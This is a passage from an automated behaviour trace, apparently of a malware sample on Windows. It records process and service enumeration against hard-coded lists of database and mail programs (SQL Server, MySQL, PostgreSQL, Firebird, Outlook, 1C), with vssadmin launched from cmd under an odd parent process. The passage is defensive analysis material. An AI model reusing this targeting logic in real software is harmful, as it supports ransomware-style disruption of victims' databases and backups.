hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0270.008] lstrlenW (lpString="services.exe") returned 12 [0270.008] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0270.008] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0270.008] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0270.008] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0270.008] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0270.008] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0270.008] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0270.008] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0270.009] lstrlenW (lpString="lsass.exe") returned 9 [0270.009] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0270.009] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0270.009] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0270.009] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0270.009] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0270.009] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0270.009] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0270.009] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0270.009] lstrlenW (lpString="lsm.exe") returned 7 [0270.009] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0270.009] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0270.009] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0270.009] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0270.009] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0270.009] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0270.009] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0270.009] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.009] lstrlenW (lpString="svchost.exe") returned 11 [0270.010] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.010] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.010] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.010] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.010] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.010] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.010] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.010] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.010] lstrlenW (lpString="svchost.exe") returned 11 [0270.010] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.010] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.010] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.010] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.010] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.010] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.010] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.010] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.010] lstrlenW (lpString="svchost.exe") returned 11 [0270.010] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.010] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.011] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.011] lstrlenW (lpString="svchost.exe") returned 11 [0270.011] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.011] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.011] lstrlenW (lpString="svchost.exe") returned 11 [0270.011] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.011] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.012] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.012] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.012] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0270.012] lstrlenW (lpString="audiodg.exe") returned 11 [0270.012] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0270.012] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0270.012] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0270.012] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0270.012] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0270.012] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0270.012] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0270.012] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.012] lstrlenW (lpString="svchost.exe") returned 11 [0270.012] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.012] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.012] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.012] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.012] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.012] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.012] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.013] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0270.013] lstrlenW (lpString="userinit.exe") returned 12 [0270.013] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0270.013] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0270.013] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0270.013] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0270.013] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0270.013] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0270.013] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0270.013] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0270.013] lstrlenW (lpString="explorer.exe") returned 12 [0270.013] lstrcmpiW (lpString1="1c8.exe", lpString2="explorer.exe") returned -1 [0270.013] lstrcmpiW (lpString1="1cv77.exe", lpString2="explorer.exe") returned -1 [0270.013] lstrcmpiW (lpString1="outlook.exe", lpString2="explorer.exe") returned 1 [0270.013] lstrcmpiW (lpString1="postgres.exe", lpString2="explorer.exe") returned 1 [0270.013] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="explorer.exe") returned 1 [0270.013] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0270.014] lstrlenW (lpString="dwm.exe") returned 7 [0270.014] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.014] lstrlenW (lpString="svchost.exe") returned 11 [0270.014] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0270.014] lstrlenW (lpString="ivttvf.exe") returned 10 [0270.014] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0270.015] lstrlenW (lpString="spoolsv.exe") returned 11 [0270.015] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0270.015] lstrlenW (lpString="cmd.exe") returned 7 [0270.015] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.015] lstrlenW (lpString="svchost.exe") returned 11 [0270.015] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0270.015] lstrlenW (lpString="conhost.exe") returned 11 [0270.015] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0270.016] lstrlenW (lpString="taskhost.exe") returned 12 [0270.016] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0270.016] lstrlenW (lpString="reader_sl.exe") returned 13 [0270.016] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0270.016] lstrlenW (lpString="dllhost.exe") returned 11 [0270.016] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x540, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0270.017] lstrlenW (lpString="vssadmin.exe") returned 12 [0270.017] Process32NextW (in: hSnapshot=0x1d8, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x540, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0270.017] CloseHandle (hObject=0x1d8) returned 1 [0270.017] Sleep (dwMilliseconds=0x1f4) [0270.991] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x41ad170 [0271.063] EnumServicesStatusExW (in: hSCManager=0x41ad170, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 0 [0271.063] GetLastError () returned 0xea [0271.063] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa08) returned 0x3afc2d0 [0271.064] EnumServicesStatusExW (in: hSCManager=0x41ad170, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3afc2d0, cbBufSize=0xa08, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3afc2d0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 1 [0271.064] CloseServiceHandle (hSCObject=0x41ad170) returned 1 [0271.064] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0271.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0271.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0271.064] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0271.064] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0271.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0271.064] lstrlenW (lpString="AudioSrv") returned 8 [0271.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0271.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0271.064] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0271.064] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0271.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0271.065] lstrlenW (lpString="BFE") returned 3 [0271.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0271.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0271.065] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0271.065] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0271.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0271.065] lstrlenW (lpString="CscService") returned 10 [0271.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0271.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0271.065] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0271.065] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0271.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0271.065] lstrlenW (lpString="DcomLaunch") returned 10 [0271.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0271.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0271.065] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0271.065] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0271.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0271.065] lstrlenW (lpString="Dhcp") returned 4 [0271.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0271.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0271.065] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0271.065] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0271.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0271.065] lstrlenW (lpString="Dnscache") returned 8 [0271.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0271.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0271.065] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0271.065] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0271.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0271.065] lstrlenW (lpString="eventlog") returned 8 [0271.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0271.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0271.066] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0271.066] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0271.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0271.066] lstrlenW (lpString="EventSystem") returned 11 [0271.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0271.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0271.066] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0271.066] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0271.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0271.066] lstrlenW (lpString="gpsvc") returned 5 [0271.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0271.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0271.066] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0271.066] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0271.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0271.066] lstrlenW (lpString="lmhosts") returned 7 [0271.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0271.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0271.066] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0271.066] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0271.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0271.066] lstrlenW (lpString="MMCSS") returned 5 [0271.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0271.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0271.066] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0271.066] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0271.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0271.066] lstrlenW (lpString="nsi") returned 3 [0271.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0271.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0271.067] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0271.067] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0271.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0271.067] lstrlenW (lpString="PlugPlay") returned 8 [0271.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0271.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0271.067] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0271.067] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0271.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0271.067] lstrlenW (lpString="Power") returned 5 [0271.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0271.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0271.067] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0271.067] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0271.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0271.067] lstrlenW (lpString="ProfSvc") returned 7 [0271.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0271.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0271.067] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0271.067] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0271.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0271.067] lstrlenW (lpString="RpcEptMapper") returned 12 [0271.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0271.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0271.067] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0271.067] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0271.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0271.067] lstrlenW (lpString="RpcSs") returned 5 [0271.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0271.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0271.067] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0271.067] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0271.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0271.068] lstrlenW (lpString="SamSs") returned 5 [0271.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0271.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0271.068] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0271.068] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0271.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0271.068] lstrlenW (lpString="Schedule") returned 8 [0271.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0271.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0271.068] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0271.068] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0271.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0271.068] lstrlenW (lpString="SENS") returned 4 [0271.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0271.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0271.068] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0271.068] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0271.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0271.068] lstrlenW (lpString="ShellHWDetection") returned 16 [0271.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0271.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", 